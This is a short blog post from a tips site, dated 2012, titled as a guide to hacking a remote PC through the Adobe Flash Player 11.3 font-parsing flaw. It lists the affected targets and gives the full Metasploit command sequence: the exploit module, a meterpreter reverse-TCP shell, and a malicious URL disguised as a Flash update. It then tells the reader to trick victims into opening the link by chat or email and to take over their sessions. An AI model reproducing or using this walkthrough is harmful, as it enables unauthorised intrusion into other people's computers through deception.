Warung Online
Headlines News :
mas template
Home » , » Hack Remote PC using Adobe Flash Player 11.3 Font Parsing Code Execution

Hack Remote PC using Adobe Flash Player 11.3 Font Parsing Code Execution

Written By Trik Cari Duit on Sabtu, 18 Agustus 2012 | 00.12

This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.3.300.271. By supplying a corrupt Font file used by the SWF, it is possible to gain arbitrary remote code execution under the context of the user, as exploited in the wild.

Exploit Targets
Adobe Flash Player before 11.3.300.271.
Internet Explorer 6 on XP SP2
Internet Explorer 7 on XP SP2
Internet Explorer 8 on XP SP2

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open backtrack terminal type msfconsole


Now type use exploit/windows/browser/adobe_flash_otf_font
msf exploit (adobe_flash_otf_font)>set payload windows/meterpreter/reverse_tcp
msf exploit (adobe_flash_otf_font)>set lhost 192.168.1.4 (IP of Local Host)
msf exploit (adobe_flash_otf_font)>set srvhost 192.168.1.4 (This must be an address on the local machine)
msf exploit (adobe_flash_otf_font)>set uripath flashplayerupdates (The Url to use for this exploit)

msf exploit (adobe_flash_otf_font)>exploit   



Now an URL you should give to your victim http://192.168.1.4:8080/flashplayerupdates


Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 


Share this article :

0 komentar:

Speak up your mind

Tell us what you're thinking... !

Bisnis Hot
Bisnis Hot
 


Copyright © . Tips N Trik - All Rights Reserved
Proudly powered by Blogger